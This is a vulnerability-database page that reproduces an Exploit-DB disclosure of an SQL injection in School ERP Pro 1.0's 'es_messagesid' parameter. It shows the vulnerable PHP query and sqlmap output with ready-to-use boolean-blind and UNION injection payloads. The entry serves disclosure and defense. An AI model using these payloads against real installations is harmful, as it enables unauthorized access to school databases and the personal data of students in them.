header-logo
Suggest Exploit
vendor:
School ERP Pro
by:
Besim ALTINOK
N/A
CVSS
HIGH
SQL Injection
89
CWE
Product Name: School ERP Pro
Affected Version From: Not specified
Affected Version To: Not specified
Patch Exists: NO
Related CWE:
CPE: a:arox:school_erp_pro:1.0
Metasploit:
Other Scripts:
Platforms Tested: Xampp
2020

School ERP Pro 1.0 – ‘es_messagesid’ SQL Injection

The 'es_messagesid' parameter in the School ERP Pro 1.0 is vulnerable to SQL injection. An attacker can manipulate the parameter to inject malicious SQL code, potentially allowing unauthorized access to the database.

Mitigation:

The vendor should sanitize and validate user input to prevent SQL injection attacks. Users are advised to update to the latest version of the software.
Source

Exploit-DB raw data:

# Exploit Title: School ERP Pro 1.0 - 'es_messagesid' SQL Injection
# Date: 2020-04-28
# Author: Besim ALTINOK
# Vendor Homepage: http://arox.in
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
# Version: latest version
# Tested on: Xampp
# Credit: İsmail BOZKURT

SQL Injection Detail
--------------------------------
*# Vulnerable parameter: es_messagesid*
*# Vulnerable code:*

if($action=="fullmessage_sent"){
$msg_qry ="SELECT * FROM es_messages WHERE
from_id=".$_SESSION['eschools']['user_id']." AND from_type='student' and
es_messagesid=".*$es_messagesid;*
$details_message=$db->getrow($msg_qry);
}
?>

*Here is the SQLmap output:*
*----------------------------------------*

GET parameter '*es_messagesid*' is vulnerable.
sqlmap identified the following injection point(s):
---
Parameter: es_messagesid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: pid=27&action=fullmessage_sent&es_messagesid=17 OR NOT
6369=6369

Type: UNION query
Title: Generic UNION query (random number) - 12 columns
Payload: pid=27&action=fullmessage_sent&es_messagesid=17 UNION ALL
SELECT
6194,6194,6194,6194,6194,6194,CONCAT(0x7162626b71,0x664750636f625866666c63425571426c5277516c49506c696f6548764c5a617977414d4849575a67,0x71707a7671),6194,6194,6194,6194,6194--
-
---
[01:09:41] [INFO] testing MySQL
[01:09:42] [INFO] confirming MySQL
[01:09:44] [INFO] the back-end DBMS is MySQL